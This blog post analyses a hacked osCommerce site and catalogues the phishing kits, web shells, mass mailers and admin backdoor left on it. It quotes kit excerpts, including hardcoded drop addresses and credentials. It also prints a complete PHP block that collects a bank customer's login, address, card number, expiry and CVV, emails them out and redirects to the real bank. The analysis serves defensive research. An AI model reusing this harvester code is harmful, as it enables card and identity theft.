Another day goes by another guy reports a hacked website. This time with new spam scripts. The vulnerable web site was running an old version of osCommerce and the attackers were quite a few in the last days. What was added to the site mainly was phising templates for AoL, BofA, and others. Interestingly there is a website referred to most of the scripts, the site is http://maroc-spam.net with really bad work on the web template there guys if you are making phising sites and you promote yours in there make a better work at least.
Looking at the AoL ( http://www.deventum.com/research/Aol.zip ) files we can find information about the card that they support on their phising, eg,
cards [0] = {name: "Visa",
length: "13,16",
prefixes: "4",
checkdigit: true};
cards [1] = {name: "MasterCard",
length: "16",
prefixes: "51,52,53,54,55",
checkdigit: true};
cards [2] = {name: "DinersClub",
length: "14,16",
prefixes: "300,301,302,303,304,305,36,38,55",
checkdigit: true};
cards [3] = {name: "CarteBlanche",
length: "14",
prefixes: "300,301,302,303,304,305,36,38",
checkdigit: true};
cards [4] = {name: "AmEx",
length: "15",
prefixes: "34,37",
checkdigit: true};
cards [5] = {name: "Discover",
length: "16",
prefixes: "6011,650",
checkdigit: true};
cards [6] = {name: "JCB",
length: "15,16",
prefixes: "3,1800,2131",
checkdigit: true};
cards [7] = {name: "enRoute",
length: "15",
prefixes: "2014,2149",
checkdigit: true};
cards [8] = {name: "Solo",
length: "16,18,19",
prefixes: "6334, 6767",
checkdigit: true};
cards [9] = {name: "Switch",
length: "16,18,19",
prefixes: "4903,4905,4911,4936,564182,633110,6333,6759",
checkdigit: true};
cards [10] = {name: "Maestro",
length: "16,18",
prefixes: "5020,6",
checkdigit: true};
cards [11] = {name: "VisaElectron",
length: "16",
prefixes: "417500,4917,4913",
checkdigit: true};
Only one file is encoded using base64 encoding and the decoded output contains, the mail where the information are sent, this is defined as : $mail ="golobaz@voila.fr";
Another directory with the name www.poste.it has phising information about poste.it website. Again there is only one encoded file containing information about the recipient of the details gathered,
$usip = $_SERVER['REMOTE_ADDR'];
$mail = "golobaz@voila.fr";
$subj = "Posteitaliane Utente ";
An interesting script that seems to be specifically created for osCommerce applications since it’s gathering data from configuration files and database is Thumbs.db.php, ( http://www.deventum.com/research/Thumbs.db.php.gz )
More scripts, slq.php file, ( http://www.deventum.com/research/slq.php.gz ) is an interface for mysql or as it’s described “MySQL Interface (Developed By Mohajer22)” with embedded username and password set to :
$PASSWORD = "root_xhahax";
$USERNAME = "xhahax";
Another php web shell “ Web Shell by oRb” under the name of account_manage.php that it is a modified version of c99 shell scripts with a slightly better interface.
The usual scripts for mass mailing, this time “ Made By Mo$`Craci|a` “ , one more backdoor on the site with the name cookie_usage.php that enables an attacker to post a crafted request and login as administrator on the system.
The Bofa, “Bank of America” phising template is sending the information gathered to the following address,
$send="latesayee800@blumail.org";
$subject = "Fresh BOFA Rezult | $user | $ip";
$headers = "From: alsa7r >";
Also inside style.css we have
<?
$IP = 'm4rk0l30p4rd@yahoo.com,m4rk0l30p4rd@hotmail.com';
?>
And finally a phising template for www.caisse-epargne.fr which under confirm_fichiers/ScriptResource_013.axd again on base64 encoding contains the following:
$message = "-----------------------------------------\n";
$message .= "--------------+ Login Info +-------------\n";
$message .= "-----------------------------------------\n";
$message .= "Nom complet : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbPrenom']." ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbNom']."\n";
$message .= "Identifiant Client : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbInternaute']."\n";
$message .= "Date de naiscance : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbDateNaissance']."\n"; include 'confirm_fichiers/ScriptResource_012.axd';
$message .= "Email : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCivilite$CC_sous_civilite_bloc$wzdCivilite$tbEmail']."\n";
$message .= "-----------------------------------------\n";
$message .= "Adresse : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbAdresse']."\n";
$message .= "ville : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbVille']."\n";
$message .= "code postal : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCoordonneesPostales$CC_sous_coordonnees_postales_bloc$wzdCoordonneesPostales$tbCP']."\n";
$message .= "-----------------------------------------\n";
$message .= "CC number : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneBureau']."\n";
$message .= "exp date : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephoneMobile']."\n";
$message .= "cvv : ".$_POST['ctl09$CC_sous_ouv_direct_ecureuil$ccSousCallBack$CC_sous_call_back_bloc$wzdCallBack$tbTelephone']."\n";
$message .= "-----------------------------------------\n";
$message .= "--------------+ Made By REDHATTeam +------------\n";
$message .= "--------------+ Thnx My Redhatteam +------------\n";
$message .= "-----------------------------------------\n";
$send="golobaz@voila.fr";
$subject = "Bravo | $login";
$headers = "From: REdhatteam - maroc-spam.net";
mail($send,$subject,$message,$headers);
header("Location: https://www.caisse-epargne.fr/pauth.aspx?");
No comments:
Post a Comment